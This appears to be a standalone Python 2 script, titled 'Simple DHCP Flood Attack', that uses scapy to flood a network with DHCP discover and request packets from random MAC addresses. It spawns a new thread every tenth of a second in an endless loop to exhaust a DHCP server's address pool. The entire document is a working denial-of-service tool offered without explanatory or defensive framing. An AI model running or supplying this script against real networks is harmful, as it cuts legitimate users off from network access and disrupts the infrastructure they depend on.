Simple DHCP Flood Attack

dhcp-flood.py

#!/usr/bin/env python

from scapy.all import *
from time import sleep
from thread import start_new_thread

# config

conf.checkIPaddr = False
interface = 'eth0'

def dhcp_discover(mac,localmac):
    eth = Ether(dst='ff:ff:ff:ff:ff:ff', src=mac, type=0x0800)
    ip = IP(src='0.0.0.0', dst='255.255.255.255')
    udp = UDP(dport=67,sport=68)
    bootp = BOOTP(chaddr=localmac,xid=RandInt())
    dhcp = DHCP(options=[('message-type','discover'), ('end')])
    discover = eth / ip / udp / bootp / dhcp
    offer = srp1(discover,iface=interface,verbose=False)
    return offer

def dhcp_request(mac,localmac,offer):
    myip = offer[BOOTP].yiaddr
    sip = offer[BOOTP].siaddr
    xid = offer[BOOTP].xid
    eth = Ether(src=mac,dst="ff:ff:ff:ff:ff:ff",type=0x0800)
    ip = IP(src="0.0.0.0",dst="255.255.255.255")
    udp = UDP(sport=68,dport=67)
    bootp = BOOTP(chaddr=localmac)
    dhcp = DHCP(options=[("message-type","request"),("server_id",sip),("requested_addr",myip),"end"])
    request = eth / ip / udp / bootp / dhcp
    ack = sendp(request,iface=interface,verbose=False)

def dhcp_attack():
    mac = RandMAC()
    mac_raw = mac.replace(':','').decode('hex')
    offer = dhcp_discover(mac,mac_raw)
    dhcp_request(mac,mac_raw,offer)

def dhcp_flood():
    print 'starting to flood dhcp..'
    print 'ctrl c to abort..'
    while True:
        try:
            start_new_thread(dhcp_attack,())
        except:
            pass
        sleep(.1)

dhcp_flood()